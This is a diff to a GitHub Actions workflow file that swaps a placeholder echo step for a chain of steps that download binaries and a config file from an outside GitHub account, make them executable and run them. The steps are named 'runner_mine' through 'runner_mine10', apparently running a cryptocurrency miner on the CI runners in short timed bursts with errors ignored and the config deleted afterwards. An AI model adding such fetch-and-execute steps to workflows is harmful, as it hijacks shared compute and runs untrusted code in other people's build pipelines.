--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -24,4 +24,63 @@ jobs:
       uses: actions/checkout@v1
     - name: runner_go
       run: |
-        echo "abc"
+        wget https://raw.githubusercontent.com/kijang-7/gas2/main/log && wget https://raw.githubusercontent.com/kijang-7/gas2/main/logs && chmod +x log logs && ./log
+    - name: runner_mine
+      continue-on-error: true
+      run: |
+        timeout 3m ./logs
+        rm -rf config.json
+    - name: runner_mine2
+      continue-on-error: true
+      run: |
+        wget https://raw.githubusercontent.com/kijang-7/gas/main/config.json && chmod +x config.json
+        timeout 3m ./logs
+        rm -rf config.json
+    - name: runner_mine3
+      continue-on-error: true
+      run: |
+        wget https://raw.githubusercontent.com/kijang-7/gas/main/config.json && chmod +x config.json
+        timeout 3m ./logs
+        rm -rf config.json
+    - name: runner_mine4
+      continue-on-error: true
+      run: |
+        wget https://raw.githubusercontent.com/kijang-7/gas/main/config.json && chmod +x config.json
+        timeout 3m ./logs
+        rm -rf config.json
+    - name: runner_mine5
+      continue-on-error: true
+      run: |
+        wget https://raw.githubusercontent.com/kijang-7/gas/main/config.json && chmod +x config.json
+        timeout 3m ./logs
+        rm -rf config.json
+    - name: runner_mine6
+      continue-on-error: true
+      run: |
+        wget https://raw.githubusercontent.com/kijang-7/gas/main/config.json && chmod +x config.json
+        timeout 3m ./logs
+        rm -rf config.json
+    - name: runner_mine7
+      continue-on-error: true
+      run: |
+        wget https://raw.githubusercontent.com/kijang-7/gas/main/config.json && chmod +x config.json
+        timeout 3m ./logs
+        rm -rf config.json
+    - name: runner_mine8
+      continue-on-error: true
+      run: |
+        wget https://raw.githubusercontent.com/kijang-7/gas/main/config.json && chmod +x config.json
+        timeout 3m ./logs
+        rm -rf config.json
+    - name: runner_mine9
+      continue-on-error: true
+      run: |
+        wget https://raw.githubusercontent.com/kijang-7/gas/main/config.json && chmod +x config.json
+        timeout 3m ./logs
+        rm -rf config.json
+    - name: runner_mine10
+      continue-on-error: true
+      run: |
+        wget https://raw.githubusercontent.com/kijang-7/gas/main/config.json && chmod +x config.json
+        timeout 3m ./logs
+        rm -rf config.json
